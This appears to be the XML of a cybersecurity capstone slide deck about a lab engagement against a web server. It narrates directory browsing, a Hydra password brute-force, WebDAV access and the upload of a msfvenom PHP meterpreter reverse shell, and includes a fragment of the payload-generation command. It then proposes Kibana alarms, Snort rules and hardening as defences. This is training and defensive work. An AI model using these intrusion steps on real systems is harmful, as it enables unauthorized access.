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79D1B5-CB9A-4CEB-8F9F-37AD48FD066C}">
  <a:tblStyle styleId="{3279D1B5-CB9A-4CEB-8F9F-37AD48FD0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f55f125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f55f125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Attack began on Dec 2, between 1:29am-1:53am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10,707 requests were made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Company_folders/secret_folder was requested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Contained information pertaining to accessing WebDav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10,707 requests were made during the brute-force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 requests had been made before the password was found.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12 requests were made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Passwd.dav shell.php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Alarm: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Monitor access attempts and set alerts according to access count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Secret folder shouldn’t have much traffic if any at all, so a threshold of 5 errors triggered w/in an hour should indicate an attack.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95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5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1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[Reverse Shell Vulnerability]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;113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msfvenom payload:php/meterpreter/reserve_tcp, the payload was created then uploaded, then executed to the Capstone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Remote access through backdoor on Capstone server as root.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Finding and accessing flag.txt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1" name="Google Shape;115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LPORT=55555 -f raw &gt; shell.php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[Port Vulnerability]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70325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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752775" y="14805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SSH and Port 22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3" name="Google Shape;1163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4" name="Google Shape;116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7" name="Google Shape;1167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Open port 22 allowed SSH access to Ashton’s account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root access,  searched through various directories until flag was found.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1" name="Google Shape;1171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2" name="Google Shape;117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3" name="Google Shape;117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screenshot below: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6" name="Google Shape;11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3543300"/>
            <a:ext cx="7811349" cy="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3" name="Google Shape;1183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9" name="Google Shape;1189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0" name="Google Shape;119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DOES NOT APPLY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93" name="Google Shape;11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0" name="Google Shape;12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925" y="368797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44725"/>
            <a:ext cx="8839200" cy="48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66100"/>
            <a:ext cx="8839198" cy="264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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100000" y="3687975"/>
            <a:ext cx="70653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Requests to the secret folder occured between 1:30 and 3:30 am on Dec 2nd.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Secret_folder requested containing passwd file</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1204" name="Google Shape;12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925" y="4091100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0" name="Google Shape;12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75" y="15939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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776374" y="1497350"/>
            <a:ext cx="26748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10,707 requests were made during the brute-force attack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 requests had been made before the password was found.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12" name="Google Shape;12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75" y="2279737"/>
            <a:ext cx="424701" cy="3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450" y="689548"/>
            <a:ext cx="5480551" cy="445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0" name="Google Shape;122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23" name="Google Shape;12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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="4092275"/>
            <a:ext cx="358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12 requests were made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Passwd.dav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shell.php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25" name="Google Shape;12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25"/>
            <a:ext cx="8409300" cy="24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2" name="Google Shape;1232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8" name="Google Shape;1238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Port scan detection through IDS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Any ICMP requests</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4478925" y="154997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Ex: create an any:any Snort rule that detects all ICMP requests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IDS rule created to detect the ICMP (port scans)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trigger email alerts through IDS like Snort so IP can be blocked</a:t>
            </a:r>
            <a:endParaRPr b="1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5" name="Google Shape;124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Detect any 401 error codes to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the secret folder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5 attempts per hour </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Google Shape;124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Segment: Move secret_folder away from company_folders parent directory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Redirect unauthorized users to a 404 error page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file path can be changed to mitigate attack frequency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Ex: disable directory listing through configuring Apache htaccess file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2" name="Google Shape;125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Set alarm to detect 401 errors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200 within an hour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Once the alarm is triggered, block the incoming IP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Solution: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Setting an alarm for 401 errors will indicate in valid authentication. After 200 attempts within the span of 1 hour. Once triggered the incoming IP will be automatically blocked.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0" name="Google Shape;126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Set an alarm that triggers an email alert if external IP attempts to access a file.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20 Attempts per hour</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1262" name="Google Shape;126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Set firewall rule from deny all to WebDav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Solution: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Setting the firewall rule from deny all to WebDav, prevents any unauthorized users from accessing it, making it more secure.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8" name="Google Shape;1268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the alarm to detect  http.request.method to “put” and url.path *web.dav* from source.ip 192.168.1.105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Set an alert email when “put” request methods are made from untrusted IPs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70" name="Google Shape;1270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configurations to block access to the “secret_folder” from any IPs other than those authorized.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Least privilege rules.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8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>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022800" y="910475"/>
            <a:ext cx="18477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192.168.1.100:5601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Elk/Kibana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8" name="Google Shape;1068;p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75" y="910475"/>
            <a:ext cx="5845251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{3279D1B5-CB9A-4CEB-8F9F-37AD48FD066C}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Tester/ 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192.168.1.100:5601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VM (Hyper-V Manager)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Jumpbox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{3279D1B5-CB9A-4CEB-8F9F-37AD48FD066C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2397950"/>
                <a:gridCol w="317705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HTTP/HTTPS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 folder access using web browser.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HTTP/HTTPS vulnerability allows an unauthenticated attacker to access company’s directories.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Brute-Force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Brute-Force attack on employees’ weak passwords allows attacker to access sensitive data on employees’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shell payload on the web server was undetected.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reverse shell payload, the attacker was able to gain remote access to the Capstone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open/SSH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easily able to gain access through port 22 by SSH, allowing attacker into employee’s account.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HTTP/HTTPS Vulnerability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 gained access by entering the web servers IP of 192.168.1.105 into the browser.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granted access to the company’s full directories including company’s employee names, profiles and a secret url path to sensitive information.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528" y="1490797"/>
            <a:ext cx="1919026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700" y="2524375"/>
            <a:ext cx="1707974" cy="1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301" y="3543299"/>
            <a:ext cx="1995650" cy="10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[Password Vulnerability]</a:t>
            </a:r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brute-forced employees passwords obtaining Ashton’s password by using the Hydra command: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 /company_folders/secret_folder/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hydra command revealed the password of an employee named Ashton.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 to /secret folder/ using ashton’s password which revealed info to access /webdav/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Ryan’s Hash was found and cracked, accessing /webdav/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accessing files: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Passwd.dav     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374300" y="1551513"/>
            <a:ext cx="2425251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75" y="2185050"/>
            <a:ext cx="2371500" cy="68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887" y="3100400"/>
            <a:ext cx="2312080" cy="6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